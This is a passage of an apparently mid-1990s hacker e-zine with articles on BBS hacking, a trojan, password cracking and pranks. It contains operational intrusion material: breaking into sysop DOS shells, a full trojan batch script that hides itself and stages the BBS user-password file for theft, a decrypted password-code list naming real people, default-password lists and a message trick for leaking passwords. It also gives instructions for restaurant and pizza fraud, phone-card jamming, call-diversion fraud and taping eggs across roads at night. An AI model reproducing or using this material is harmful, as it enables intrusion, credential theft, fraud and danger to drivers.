  will have to pay a hell of a lot of kash to repair the pipe's!! 
  
  Go for it man!
      
       
-----------------------------------( 12 )-----------------------------------
                             7 LiTTLE POSTiE'Z!

----------------------------------by StiGZ----------------------------------

  eD: I was gonna put this article in here, but i want to release               
      this mag as early as possible so, i thought i would put the
      7LP'Z file in the next ToT ..
      
                
-----------------------------------( 13 )-----------------------------------
                                LOCKSMiTH'Z!

--------------------------------by Red Lion!--------------------------------

  Ed: Someone requested this and Red Lion decided to write the 
      small info for that particular unknown user!
      
  if you want to learn about loacksmiths or even get the latest 
  'MIT guide to picking Locks' then try the ftp site below!
  
  world.std.com:/archives/alt.locksmithing/MITGtLP/MITLockGuide.ps.Z

  You will need a PostScript printer or previewer to view this file.

  Dave Ferret <ferret@works.uucp> scanned/typed in a version of the
  Guide, it is a file of the text of the Guide and a collect of GIFs of
  the diagrams.  This can be found in ZIP and tar format in:

  world.std.com:/archives/alt.locksmithing/MITGtLP/unofficial


Locksmith Glossary:
~~~~~~~~~~~~~~~~~~~
blank       - A key that has not yet been cut to fit a lock.
core        - A removable cylinder and plug, used in a interchangeable core
              system.
core key    - A key which is used to remove a core.
cylinder    - The part of the lock in which the the pins are set and
              which contains the plug.
cuts        - The notches cut in the key to make it fit a lock.
key way     - The slot in which the key is inserted.
master key  - A key which opens a group of locks designed to match it.
pin tumblers- the pins in the lock which are moved to the shear
              line by the key
pin chamber - the tubular hole in which pins and a spring stay
plug        - The part of the lock which the key is inserted and is rotated
              by the key.
wafer tumble- used in locks which are less expensive than pin tumbler
              locks.  They behave somewhat similarly.
warded lock - A lock using wards to keep an incorrect key from
              entering the key hole and turning.

          
-----------------------------------( 14 )-----------------------------------
                              BOARD'Z TO CALL!

----------------------------------by Hype!----------------------------------

  Here'z some bbs'es for you to call..
  
  Name,..            No,..                Sysop,..       baud,..       
  ~~~~~~~            ~~~~~                ~~~~~~~~       ~~~~~~~
  FiTh bbs           +64 4 232 SCAN       BaD LaNGuaGe   28.8k
  FaTe               +64 9 535 0428       PhOdEr!        14.4k
  HaCkeR'z OdySSey   +64 4 382 0173       HyPe           14.4k 
  PiPe II            +64 9 296 3023       ???            14.4k
  SPaCe aGE          +64 9 ITZ DEAD       CaNaaN         14.4k
  sCREAMING mETAL    +61 9 382 4425       Acidman        14.4k   
  BaD SecToR         +64 4 479 1641       Grass Hopper   14.4k
  tiNNY HoUse        +64 9 410 SCAN       ???            14.4k
  PiRAtEz dEN        +64 9 838 SCAN       ???            14.4k
  
  
-----------------------------------( 15 )-----------------------------------
                                 MC'D TiP'Z

----------------------------------by Nick!----------------------------------

  Drive thru mc'd now order say.. 2 big mac's, 1 cheese burger, med frie's
  and a med coke. Get your order and get out of your car and take the
  mc'd package inside to the front, (this is done best when mc'd is really
  busy!) First take out of your mc'd bag say.. 1 big mac, so you have,  
  1 big Mac, 1 cheese burger, med frie and a coke!
  
  Take the bag up to the counter and say hi i ordered.. 2 big mac's etc etc
  and show them the receipt! They will have a look in your bag and then say
  "Sorry bout that i will just go and get your other burger" =] 
  Now when the person comes back with the extra big Mac, say i hope this
  wont happen again! Or whatever or "Thank you, sorry for making trouble
  but i alway's make sure i get what i order" 
  
  This is really nothing, its joke's really and can only be used 4-5 times
  always a different mc'd worker or a different mc'donald restaurant!!
  
  One more trick
  
  Order the meal and sit down and start eating, then about 2/3rd's of the
  burger stop and put a thin piece of hair inside, (Works best if the
  colour of the hair doesnt look like your hair colour, so for instance
  grab your mates hair off hehe!) Now go to the counter and say "Hey,
  what the hell is this!?" Once Mc'd see's it they will get angry cause
  if customers are watchin you complain, they stop going to eat their
  hehe, At the end you should get a huge refund, cause they know that
  if they dont give you food you could sue their ass'es off! But make
  sure you sound serious as if you were about to die from eating the 
  burger! 
  
  Well, thats it from me.. Catch ya in tot 4 then ay!?
  
 
-----------------------------------( 16 )-----------------------------------
                              POSTiNG FOR FREE

----------------------------------by Hype!----------------------------------

  Its simple tho i havent tried it for a long time,
  Just do the opposite..
  
  Instead of putting the addie on the front of who you are sending to..
  put your addie and the other persons addie on the back, and write
  sender on the addie which is on the back.. And dont use any stamps
  now go to the post-box and chuck it in, the postie comes to collect
  the mail and then see's there is no stamp so he send's it back to
  the sender addie! Easy heh?


-----------------------------------( 17 )-----------------------------------
                              BBS HACKiN'(PT1)

----------------------------------by Hype!----------------------------------
 
  Lame artcle, I only did it cause users have been busting my balls
  about this shit! Anyway have phun and dont screw the sysop too
  badly!!
   
  REMEMBER: THIS ARTICLE IS FOR INFORMATIONAL PURPOSES ONLY, IF YOU 
            USE THE INFORMATION HERE THEN ITS YOUR RISK NOT MINE!
            
  Logon Searchlight or any bbs proggie!
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  Name> guest
  password> guest
  
  When you see the shit come up.. eg:
    
   
   
  Bullet-In-Baud BBS Welcomes GUEST on Fri, 5/05/95, 22:37
  You are caller no. 7104, with 0 calls total
  Logging Name...

  You have 180 minutes of system time left today.

  Last caller was HACKER.

  No other users currently online.
  Jon is insane enough to chat

  Do you wish to be Available for Chatting?  Yes  No  
 
 
 
  anyway as soon as you have entered your psw after the login
  keep pressing CTRL-C until you get..
   
  Terminate batch job y/n
   
  Ok, this is the same method as the library hackin but is more phun!
  once you do 'y' you will be dropped in the system's dos-shell
  
  If you font get 'terminate batch job y/n' then try another bbs!
  you will find one eventually, Magpies workd for me so did 
  power bbs, twilight zone and a few otherz!
  
  Things to remember:
  ~~~~~~~~~~~~~~~~~~~ 
 -Make sure that the sysop isnt watching
  to bypass this page him under another handle eg: clauz 
  and keep chating to him.. and when you get a good chance
  quickly find out when he's not home etc..
  
 -Sysop's have log's.. Try and delete the log file after  
  ya finsihed haqin
   
 -If you find the log_file then wipe the phuQ'r cause
  when the sysop finds the log and see's that his user
  file had been downloaded, he will warn the users etc
  and change lots of psw's!!!
  
 -If you want to del files then use 'wipe' its like del
  but works better,, harder to recover the files i think!
  
 -User.sl2 is in the c:\slbbs or c:\bbs... just look around
 
 -Dont try and run games if you see any!
 
 -Try not to spend too much time in the dos-shell
 
 -Try and get the Searchlight (or whatever type of s/w)
  config file, if you succeed then replace the config
  from the bbs you haq'd with your ole bbs config 
  (thats only if you have the same s/w as the sysop has)
  
 -Dont waste your time with trojans, viruses
  unless you wanna get in a LOT of trouble!
  
 -Think like a haq'r, if you get cut off while in dos
  dont call back straight away otherwise.. you can b
  traced!
 
 -Always go for dumb sysop's
 
 -Zmodem -sz (file) should dl what ya want..
 
 -There might be more than 1drive =] b: a: etc
  
 -Sometimes user.sl2 is kept in c:\bbs\slbbs\
 
 -If ya hang up while in dos, the bbs will be 
  down, and when sysop see's the dos prompt
  he will read the log file and notice the ctrl-c
  and will probably edit the prg so it doesnt drop
  to dos! some bbs'es are fixed..but some arent
  
 -If you dont have a bbs-target then grab the latest
  bbs_list and try haQ'n some of the new boards that
  just came in..
  
 -Dont drop to dos too often otherwise the sysop
  will catch on!
  
 -Try all systems, 
 
 -Sometimes you can drop to dos from Ctrl c
  in a door-game! They are batch files hehe =]
  
 -dont format the hd... unless you are 
  prepared to do so if the sysop finds out
  you done it!
  
 -When finished type 'exit' to get back on bbs
 
 Ok, now heres ways of getting the user.sl2 or users.dat, users.idx
 file!
 
 BASIC WAY TO GET USER FILE 
 ~~~~~~~~~~~~~~~~~~~~~~~~~~
 1> find the user file c:\bbs ??
 2> copy it over a txt file thats on the bbs
    example..
    
    C:\BBS 
    C:\BBS cd txt_files
    C:\BBS\TXT_FILES delete mj.txt
    C:\BBS\TXT_FILES cd..
    C:\BBS copy user.sl2 c:\bbs\text_files
    C:\BBS cd txt_files
    C:\BBS\TXT_FILES rename user.sl2 mj.txt 
    C:\BBS\TXT_FILES cd..
    C:\BBS exit
    
 3> leave the same name
 4> 'exit' to bbs
 5> search txt file mj.txt
 6> Download the phuQ'r
 
 BASIC WAY TO GET USER FILE
 ~~~~~~~~~~~~~~~~~~~~~~~~~~
 1> find user file
 2> type..
    
 C:\BBS zmodem -sz user.sl2
 C:\SLBBS zmodem -sz user.sl2
 C:\RENEGADE zmodem -sz user.idx
   
 DOOR GAME TROJANS
 ~~~~~~~~~~~~~~~~~
 there is other ways to hack board's..
 If you know how to make/edit batch
 files then this shouldnt be hard!
 
 1> Get a door game eg: Hacker
 2> Edit the batch file so that you can drop to dos
    when you type in some special word for your name
 3> Once you have play-tested it
 4> Ask sysop's if they want a NEW door game! 
 5> If that doesnt work then change the version no eg:
    hacker 1.5 to hack 3.0a that way the sysop that
    already has the door game will want to update it
    with the latest copy you have!
 6> Once the stoopid sysop runs the door and tests
    it he will allow users on the bbs to play
 7> Bingo ..you changed the batch file so you know
    the exit2dos-passwd hehehe
 8> Type in the kode you choose or whatever way you
    made it quit to dos
 9> (should be in dos by now)
10> Find user file
11> zmodem -sz (passwd file)
12> Relax, exit back to bbs if at all possible!
13> Logoff normally 'g'

 I was gonna put the actual command lines for the door game
 which lets you drop to dos at a certain point! BUT if sysops
 found it, they would go mental ..and probably they will 
 all run a more secure bbs s/w package eg's: remote axx!
 ctually, thats not too hard to haq!
 
 Ok, now go and read BBS hackin part 2...
 I have included a batch file of a trojan you can use to destroy
 haq boards! the batch file was written by a friend sorry cant say
 who =[ l8r
 
-----------------------------------( 18 )-----------------------------------
                              BBS HACKiN'(PT2)

--------------------------------by Red Lion!--------------------------------

 <all files mentioned here will be made availible on a BBS kalled
  Bad sektor> 

Problem 1: WRITING THE BATCH PHILE!
Here is the ultimate batch file. It searches the sysops HD for his users.sl2
(or wotever) and attaches it to a zip on his hd. Here is the batch file and
information on it in following:

@echo off  
cls
ctty nul
ren l.dat pk.exe
ren l.da0 an.com
dir C:\!MELODUS.ZIP /s /b >> C:\k2.txt
dir D:\!MELODUS.ZIP /s /b >> C:\k2.txt
dir E:\!MELODUS.ZIP /s /b >> C:\k2.txt
dir F:\!MELODUS.ZIP /s /b >> C:\k2.txt
dir G:\!MELODUS.ZIP /s /b >> C:\k2.txt
dir C:\users.sl2 /s /b >> C:\users.sl2
dir D:\users.sl2 /s /b >> C:\users.sl2
dir E:\users.sl2 /s /b >> C:\users.sl2
dir F:\users.sl2 /s /b >> C:\users.sl2
dir G:\users.sl2 /s /b >> C:\users.sl2
an < C:\k2.txt 
if errorlevel 1 goto env
set zip=%answer%
an < C:\users.sl2
if errorlevel 1 goto env
del C:\k2.txt
del C:\users.sl2
pk -a %zip% %answer% > nul
ren pk.exe slfix.dat
ren an.com slfix.da0
ctty con
goto end
:env
Echo Not enough enviormental space to run the game. Please reboot your machine and 
echo then type Command /e:1024 at the prompt then run again
:end
<run a proggy here>

PROBLEM 2: Understanding what you just read.

Okay here's the low down:

 @echo off  

Turns echo off, if you don't know this much gome home and learn sumink Lamer!

 cls

Clears the screen (wow this is top secret stuff)

 ctty nul

This is a brill command which puts all input and output to the dummy device.
If you don't know wot Nul is it ain't worth continuing ;-)

 ren l.dat pk.exe
 ren l.da0 an.com

Renames the two files included witht his batch file (you can call them 
Wot ever u like but they r actually: pk.exe (pkzip found everywhere)
and answer.com (found on Bugboard (WGTN) in one of those batch zips..) 

 dir C:\!MELODUS.ZIP /s /b >> C:\k2.txt
 dir D:\!MELODUS.ZIP /s /b >> C:\k2.txt
 dir E:\!MELODUS.ZIP /s /b >> C:\k2.txt
 dir F:\!MELODUS.ZIP /s /b >> C:\k2.txt
 dir G:\!MELODUS.ZIP /s /b >> C:\k2.txt

Searches his HD for a zip called !melodus this could be any file you want..
and puts the coordinates into K2.TXT

 dir C:\users.sl2 /s /b >> C:\users.sl2
 dir D:\users.sl2 /s /b >> C:\users.sl2
 dir E:\users.sl2 /s /b >> C:\users.sl2
 dir F:\users.sl2 /s /b >> C:\users.sl2
 dir G:\users.sl2 /s /b >> C:\users.sl2

Searches his HD for his users.sl2 and puts the coordinates into C:\users.sl2

 an < C:\k2.txt 

Using K2.txt (showing the coordinates of the file you want to attach the users
file to) as an input it answers that question and puts into enviorment 
%answer% 

 if errorlevel 1 goto env

Answer.com returns an errorlevel of 1 if there is not enuf enviourmental 
space

 set zip=%answer%

using the %anser label% (which is now the co ordinates of his users.sl2) you
set zip as its new label. This so answer doesn't overwrite the previous 
varible when you ask it again in a few lines.
 
 an < C:\users.sl2

Using Users.sl2 (Showing the coordinates of their users.sl2 file) as an input
it answers that question and puts it into enviourment %answer%

 if errorlevel 1 goto env

same as above

 del C:\k2.txt
 del C:\users.sl2

deletes the evidence ;-)

 pk -a %zip% %answer% > nul

Zips the users.sl2 file to your chasen %zip% :-) an puts the output to none
as some how PKZIP writes directly to the screen so ctty nul doesn't work.

 ren pk.exe l.dat
 ren an.com l.da0

Renames the evidence.

 ctty con

Gives control back to the user

 goto end

Nuh staph.. Have a wild guess.

:env
Echo Not enough enviormental space to run l.com Please reboot your machine and 
echo then type Command /e:1024 at the prompt then run again

This is the wot the user is told if there is not enuf enviormental space.

:end

I'll give you one guess


SO there's your DECENT trojan.. A bit better than that shit Format C: one eh 
;-) 

Problem 3: Getting em to run it

Ok now this is kewl but it is not really any use unless u can get 
the guy <gal> to run it. So here is my theory on that:

Okay first up download an awesome utility called L.com  

Then rename it L.da1
DO NOT compile the above batch phile as it is unlikely to work if u use
it as bat2exec is SHIT! and then call it l.da2.
Then do the following:

Make a batch phile called l.bat and add the following:

@echo off
ren l.da2 lc.bat
ren l.da1 d.com
lc.bat

This is self explainitory. DO NOT Compile it we still need to change a few 
things. 

Problem 4: The sysop will get supicious, when he has to wait for 3 mins for 
the proggy to start. 
EASY again. if you have compiled l.bat like you were told not to re-write it,
cause you will have to add the following:

At the end of the phile add:

move C:\l\d.com C:\
move C:\l\readme.txt C:\
cd C:\l
echo Y | delete *.*
move C:\d.com C:\l
move C:\readme.txt C:\l
ren C:\l\d.com C:\l\l.com

Ok this is pretty easy but hey:

 move C:\l\d.com C:\
 move C:\l\readme.txt C:\

Ok moves d.com and readme.txt out of the l directory (d is the real util). 
U maybe wondering how do you know it is in C:\l\??? well that is explained in 
problem 6. Also u may be wondering where this readme.txt came from. That is 
also explained in problem 6.

 cd C:\l
 echo Y | delete *.*

Deletes all the hacking philes ;-) Removing the evidence.

 move C:\d.com C:\l
 ren C:\l\d.com C:\l\l.com

puts (d)l.com back in its place.

STILL DON'T COMPILE this batch file!

Problem 5: He/She might be really brainy or cautious and want ot check wot 
all those data philes were!

Add the following to l.bat

C:
cd \l
echo 2112!98+ä¬B7!4Q69Ý >> \l\l.dat
echo [sum more junk charaters!] >> \l\l.dat 
echo [sum more junk charaters!] >> \l\l.dat       
echo [sum more junk charaters!] >> \l\l.dat 
type \l\l.dat >> \l\l.dat
type \l\l.dat >> \l\l.dat
type \l\l.dat >> \l\l.dat
type \l\l.dat >> \l\l.dat
type \l\l.dat >> \l\l.dat
type \l\l.dat >> \l\l.dat
del \l\l.dat
Echo INSTALL has set up l.com to your best work on your computer.
Echo Run by typing l. This utility is much better if put into the path.

Explanation:

 C:
 cd \l

Moves u into the l dir..

 echo 2112!98+ä¬B7!4Q69Ý >> \l\l.dat
 echo [sum more junk charaters!] >> \l\l.dat 
 echo [sum more junk charaters!] >> \l\l.dat       
 echo [sum more junk charaters!] >> \l\l.dat 

Put some junk characters (alt key combos) in the [sum more junk characters]
box. This makes the file look like it was important ;-)

 type \l\l.dat >> \l\l.dat
 type \l\l.dat >> \l\l.dat
 type \l\l.dat >> \l\l.dat
 type \l\l.dat >> \l\l.dat
 type \l\l.dat >> \l\l.dat
 type \l\l.dat >> \l\l.dat

This keeps writing itself onto itself

 del \l\l.dat

This deletes that phile which hopefully has used the same sectors as the 
others and made them un-un deletable ;-)

 Echo INSTALL has set up l.com to your best work on your computer.
 Echo Run by typing l. This utility is much better if put into the path.

Tells the Sysop u have finaly finished WASTING his HD! ;-)

Now you can finally compile this batch phile!

Problem 6: Far to bluddy obvious for a person who takes the time to look at
it b4 running.

Ok well this is EASY! Do the following:

PKZIP install.dat *.* (thats l.com, l.dat <pkzip>, l.da0 <answer>, l.da1 <the
true program l.com REALLY kewl utility I use it all da time>, l.da2 <our 
little trojan> 

Then run ZIP2EXE (comes with pkzip 2.04g) to make it self uncompressing)

Then make a batch phile with the following:

Md C:\l
copy install.dat C:\l
cd\l
copy readme.txt C:\l
ren install.dat install.exe
install.exe > nul
del install.dat
l.com

Compile it.

Now make up a kewl text phile saying how kewl this is and how it   
makes running a BBS a breeze etc etc. Call it readme.txt (wot an original name
but hey I am in a hurry ;-) )The sysop will see this run the install proggy 
and it'll automatically start up our trojan. Make sure you put that the 
following must be run b4 execution:

command /e:1024

Now, go onto that board a couple of days later and DL that file L8 at night
just in case the sysop has somehow worked out our little secret.

Now wot do you do with this users.sl2 file?? USE SLPASS of course ;-)

Happy Hacking,
      
	Red Lion


-----------------------------------( 19 )-----------------------------------
                                   SLPASS
                            
----------------------------------by Hype!----------------------------------
  
  This article is refered to the s/w proggie Searchlight (all versions)
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  SLPASS is a proggie designed to de-crypt the user.sl2 so you can see
  the sl-kodez! so what you do is get a user.sl2 heres the one from
  Insomnia, it was a bbs (non-24hr) run by Jonathan Pattison, err:
  Morpheus is his alias! Lame cunt too
  
  Attempting to open USER.SL2 file, If you can still see this message the
  attempt has failed, please have the USER.SL2 file in the current directory.
  SYSOP                    46 98 4B         FY?K
  GREIG TEMPERO            B1 44 E0         $DYZ-Y4
  CRAIG BASSETT            CA 2A F9         YL%*YZF
  KELVIN BROWN             58 58 58         XXX
  GRASS HOPPER             79 50 50         $PPU
  ROBERT WILKIN            D2 58 00         YT%X
  STEVE                    AC A2 50         YSYIP
  RAIDER                   44 98 45         $1$%3*%$1
  PHREAKER                 D7 96 48         $Y=HYZ
  XANTH                    58 74 97         XO%Y>
  DARKMAN                  30 DE 24         0YZ+$
  MADDOG                   F3 8E AA         $Y5YQYR$
  BAD LANGUAGE             E1 B3 21         &@EXAYZ
  
  ^- Username              ^- ???           ^- Sl-kode
  
  Basically thats what you get once you run the user.sl2 file..
  Then what you do for instance say if you want to log on insomnia
  under Bad Language then you just..
  
  1> Logon insomnia
  2> username: Bad language
  3> password: &@exayz
  4> your_in_dewd 
  
  Downer about sl-pass is it cant generate the original passwd's!
  It just decrypts the user.sl2 file into these kodez! so these kodez
  will only work if the dewd uses the same passwd on other Search L
  system's! Oh and dont try these kodes on other s/w it wont work!
  
  HOW TO USE SLPASS
  ~~~~~~~~~~~~~~~~~
  1> Obtain a user.sl2 file
  2> type..
  
  slpass >sl_kodez.txt
  
  ^- This should decrypt the user.sl2 and save the file as sl_kodez.txt
     easy huh? =]
     
  IS IT POSSIBLE TO OBTAIN THE ORIG PASSWD'S  
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  Yes, it is but can be VERY difficult, if you read the doc file or
  i think its the slpass.bat file it has a bit at the end sayin the
  theory to making slpass decrypt original passwd's!
  
  CONCLUSION
  ~~~~~~~~~~
  Now that you have the basic idea of using user.sl2 and slpass go
  out there and start haQ'n.. Obtainin the sl2 file.. err, read
  bbs hacking (PT1) umm, heres another basic idea!
  
  Tell a sysop you have searchlight and you are running blah-blah bbs
  and that youre user.sl2 file got phuq'd and you didnt have a backup
  to replace it, so you kindly ask him "could you send me your user
  file," If the sysop doesnt know that it contains the psw'z etc he
  will probably upp the file to you! If not and he says you want the
  psw's and hang's up then, call back later under another alias and
  page the sysop, when he answers say "Hey dewd can you pleez find
  me a file" if he says "yeh what file" say.. "umm, im not sure but
  i know what it looks like (bribe the sysop tell him someone the sys
  know told you bout a file on the board) when you get to dos..
  have you macro key ready example:
  
  F1: zmodem -sz user.sl2 
  
  When the sysop says hang on (or etc) then quickly hit F1..
  (the user file is normally no bigger than 100ks well depend's on how
  many users there are online, eg: 400users = 100-120k user.sl2)
  anyway by now the sysop should have returned IF he caught you dling
  the file say.. "What was that file you just sent me?" that way he will
  think shit, luckily he doesnt know that file contains the passwd's/
  user info etc.. If the sysop is clever and aborts the file while you
  had been transferin then the user.sl2 wont work for you, and he wil  
  be angry! So what ya do then (if he catches you) "Fuck what are you
  doing i dont want that file i want blah-blah" keep telling him that
  if he gives you the file you will give him axx to your blah-blah bbs!
  at this point he should have given you the file you wanted! now easy
  part is call back 1hr later and say hey dewd that file didnt work
  can i grab it off you again!? if he says no then keep tryin if he
  says "ok" then quickly say "i have a file for you its a magazine
  called VFILEZ which tells you about the latest warez/files which
  contain virus'es etc! he will say ok upload it (make sure you are
  in dos at the time) also rename the file you want to upload (txt)
  to vfilez.exe ...Tell the sysop the file is almost 300k's (if poss 
  log on the bbs at the slowest rate as possible 2400 is perfect)
  the sysop will say ok up it (now since the file is so phuQ'n big 
  he will wander off and do somethin else but not that quick!) Its
  best to wait for the file to transfer about 40% then of course you
  ABORT ABORT.. now get back to the user.sl2 and DOWNLOAD the phuQ'r
  the sysop shouldnt be watchin at all, tho he maybe in the same room
  so becareful, remember T-RY TO BE QUICK.. once you got the user.sl2
  get back to where he had left you (dont re-upload the file) just
  hang up call back leave mail sayin sorry i have Callwaiting on my
  line and i got cut off while transferin the file! etc etc
  
  Kool hah? oh and if you really gonna upp the sysop a file try and
  make the file real, that way if he looked at it and saw the file was 
  for real vfilez (viruz filez) etc then he wont look at the log etc
  and the passwd file will still be 100% as you found it.=]
  
  FINDING A PASSWD ON RENEGADE
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  This will only work on any bbs which runs RENEGADE s/w
  
  Just leave email to the user you want to hack
  example..
  
  Send: sysop
  Subject: %pw
  
  msg
  /save
  
  now when you get the reply you should see..
  
  
  to: Guest
  from: sysop
  subject: mybbs
  
  msg
  /save
  
  ..its just plain simple using varibles.. So herez what ya can do
  so they will quote the /msg so you get their passwd..
   
   
  send: Lamah
  subject: Nothing!
   
  Lamah .. hey dewd i was told you have a game called %pw ..and if at
  all possible can you please upload/attach it to this msg
  
  -Guest
  /save
  
  ..If youre lucky and Lamah has a Lame passwd you will get a reply with
  the quoted msg (oh and when they look at the msg it doesnt have %pw
  it will have their psw displayed their instead!)
   
   
   
  date: 17-05-95
  from: Lamah
  to: Guest
  subject Nothing!
  
  >Lamah .. hey dewd i was told you have a game called PSYCHO ..and if at
  >all possible can you please upload/attach it to this msg
  
  No what the hell are you talkin about man! Never heard of that game
  before! But i will keep an eye for you anyway
   
  ps: you have pc???
  
  LaMah!
  
  
  Ok, simple huh.. lame way to find out ppl's passwd'z but does WORK!
  Also there is a back-door on renegade so that you can leech the 
  user file while in the chat mode but i havent found out what it is  
  yet, may put it in tot4..
  
  
-----------------------------------( 20 )-----------------------------------
                                PASSWD LiST!

--------------------------------by Red Lion!--------------------------------

  O, Kool a list of the common psw's people use on bbs'es and on some
  unix systems, also try names for the passwd's of the user you wish
  to hack or if you know their home phone number try that!
  
  bbS PasSWd'z                     uNiX defaULtz            
  ~~~~~~~~~~~~                     ~~~~~~~~~~~~~             
  public                           root 
  password                         daemon             
  private                          unix        
  fuckoff                          necron             
  lamer                            public             
  elite                            pub                                      
  lame                             games             
  system                           uucp             
  hacker                           new             
  unix                             cron             
  slbbs                            test                  
  welcome                          user
  new                              guest
  security                         vt100
  bbs                              system
  bbslist                          sysadm
  gripper                          usenet
  fred                             admin
  weird                            adm
  chaos                            dos
  fuck                             ttyp1
  shit                             ttyp2
  test                             menu
  phreak                           roott
  pirate                           batch
  warez                            help
  data                             demo
  anonymous                        usenet
  guest                            news
  kiwi                             console
  system                           tty
  letmein                          bin
  shadow                           sync
  hoodlum                          mountfsys
  bbshacker                        lps
  amiga                            rje
  underground                      close
  warez                            shell
  help                             dos      
                                   student
                                   dir
                                   network
                                   sys
                                   data
                                   

-----------------------------------( 21 )-----------------------------------
                               UNiX SYSTEM'Z!
                                   
--------------------------------by Red Lion!--------------------------------

  Herez some UNiX numbers for you to try..  
  
  DataNet        64 9 358-1107
  Affco          64 9 358-1368
  Affco          64 9 358-1374
  Pabx           64 9 358-1410
  Ibm            64 9 358-1537
  
  On affco.. if you want to use telnet then type 
  
  t on       (from the AFFCO prompt)
  
  turns on telnet mode!
  
  I havent played around with these systems much..These are auckland nos
  so if you call em from welly then of course you have to pay! =[
  
  Thanx go to d-mouse for these numbers! 
    

-----------------------------------( 22 )-----------------------------------
                               EGG EXPERiMENT

---------------------------------by GreyRat---------------------------------

  Materials:
   
 -Gaffer tape (or strong tape)
 -Eggs
  
  Method:
  
 -Put the heavy duty tape from one side of a bridge to the other at the
  height of windscreen of a car.
 -Stick the eggs to the tape.
 -Leave the scene of the crime
  
  This is to be done late at night, so an unsuspecting car hooning around
  the streets cant see the tape and runs into it and gets egg shit all
  over his window!
  
  This does not have to be done on a bridge, but can be done anywhere
  where there is a fairly narrow road and a place to stick the tape to.
  
  
-----------------------------------( 23 )-----------------------------------
                                 FREE PiZZA

----------------------------------by Hype!----------------------------------
  
  Order a pizza jumbo size whatever as long as it totals the cost
  to no more than $50
  
  The pizza delivery people only carry $20 or $30 change so what you do 
  is go to a house with a long drive-way (where the people that live 
  their arent home) now, stand outside waiting for the pizza guy and 
  when he arrives get the pizza and hand him a hundred dollar Bill!
  he will say "sorry, i dont have enough change and i will come back
  with more money blah blah" so say "thats, no problem" the pizza dewd
  will give you the pizza, (The pizza guy wont take the 100 dollars
  until he has given you the right change) so start walkin down the 
  drive and when the pizza dewd has gone, Then take the pizza to where
  you live or whereever and eat, The pizza guy will come back knock
  on the door and probably will get REALLY pissed off! cause he just
  realized some asshole got a pizza for free! Hahah =]
  
   
-----------------------------------( 24 )-----------------------------------
                                 DiSABLE CW

----------------------------------by Hype!----------------------------------

  To disable callwaiting pick up your phone and dial *52 you should
  hear a tone then simply dial the number you want, If someone trys
  to call you while you are using the *52 number they wont be able
  to reach you until you have hung up on the call you are on..
  
  If you are on the modem and dont want to get disturbed (only if
  you have cw)
  
  atdt*52,(number you are calling)
  example..
  
  atdt*52,3820173
  
  Yup thats it dewd, now disable cw and get some kool files!

  
-----------------------------------( 25 )-----------------------------------
                             JAMMiN CARD FONE'Z

----------------------------------by Hype!----------------------------------

  This trick pisses Telco off, but who gis a flippin phuQ!? 
  All you do is get a blank phone-card (dont use a card with
  credit on it already cause you will lose it!)
   
  Diagram..         ______________ 
                   |    _.^._     |
                   |           $5 |
                   |  Telec0m     |
                   |_ .--. _      |
                   | `o  o'       |
                   | '    \       |
                   |/.\C)/ .      |
                   |. .~~.  .--.  |
              ---> | ..::. <.o  o.| <---
                   |.-------`.  c\|
                   |  . . .   /`-'|
                   |  . . . .'    |
                   |______________|
                   
  Put your card up against the one of the screen where you see the <---
  mark is where you have to bend it..
  
  so the card should look like this diagram below!
                    ______________
                   |              |
                   |              |
                   |              |
                   |              |
                   |              |
                   |              |
                   |              |
                   |              |
                   .              .
                   .              .                                  
                   
                   '              '
                  . ____________ .
                  
  Fuck it aint easy to draw the fucking angle, its roughly about..
  Shit i cant find my protracter.. ahh i will tell you the size
  bend in millimetres, yeh i will just put a flat card on top of
  my bend one and tell you how many ml's difference it is to the
  flat part.. 
  
  Yup its 6ml's from the end... ok so make sure you have it bent
  down so it makes 6mls..
  
  the flat diagram should look like this..
  
  _________________  
  `----------------:::::..._      umm no! not that wide, herez
                                  a better one...
  _________________                    |
  ~~~~~~~~~~~~~~~~` -  -  ._      <----'
                    
  Thats about as close as it gets with ascii. the card is then
  put in the machine like normal then if you have bent it the right
  amount the card should get stuck inside and wont come back out
  and the machine will sound like a record player fucking up the
  record! =]
  
  WHAT IS THE POINT OF JAMMIN THE PHONE?
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1> Fuck off Telco!
  2> What else you gonna do with a blank card
     (some people buy them for collection tho)
  3> get 2 cards from 1.. HOW?
  
  Ok, to get 2 cards from one card is simple..
  
  Jamm the cardphone with the card you made..
  Wait for someone to come in and use the phone, when they put their
  card in it should get stuck inside with your one, but if a third
  person trys to use a card then it wont go in at all.. 2 cards is
  all the machine can handle i think..
  Once the person goes out either 1> Call telco and tell them your card
  got jammed in the card-phone-machine or simply find something sharp
  that you can use to get cards out of the machine when inside!
  
  SOMETHING THAT HAS NOTHING TO DO WITH CARD PHONEZ
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  I was in Queensgate last week and when i went in the elevator i got  
  this idea! So please try it cause it can be fun!
  
  Go into the elevator (most mall's should have phonez in their
  elevators if you cant find one go to queensgate) Anyway once inside
  if at all possible TRY and lock yourself inside the elevator just
  for a short amount of time 5mins should be enough!
  Pick up the dtmf phone just at the bottom kept inside a metal-plate
  door, which has a picture of a phone on it! And dial a local number
  (worked for me tho, it went clunk about 5times till the call was 
  connected) Anyway dial Telecom 123 and tell them you want your calls
  divertered to a number overseas you know of which has a bbs or what-
  ever you want to call for free in another area/country!) 
  MAKE SURE, if you dont know how to do social-engineering READ SLi
  Mag #o1 It has a *nice* article on social-engineering
  Once you have got telecom to have the calls divertered from the
  elevator number to some other expensive place.. go to a payphone
  and test the fucker out!! 
  
  Also you can use the elevator phone to make local calls but takes
  a little while to connect!!
  

-----------------------------------( 26 )-----------------------------------
                                MiCROWAVE'Z!

--------------------------------BaD LaNGuaGe--------------------------------
  
Here is some shit you might want to try if you are rich, plain fucken stupid
or want to get rid of some stolen property fast!!!


Experiment #1
-------------

What you will need:

1 x Microwave
1 x Cordless Phone


Method:

Use the cordless phone to dail up a few of your mates and tell them to come 
over to your place fast!!

When they arrive get them to go to one of the normal phones, once you have
em positioned take the cordless phone and push the 'talk' button to get a 
dial tone (the button you push varies on different phones) and put it into 
the microwave. (now all the fun is about to start!).

Set the microwave on high for about 10 minutes but before you push start get
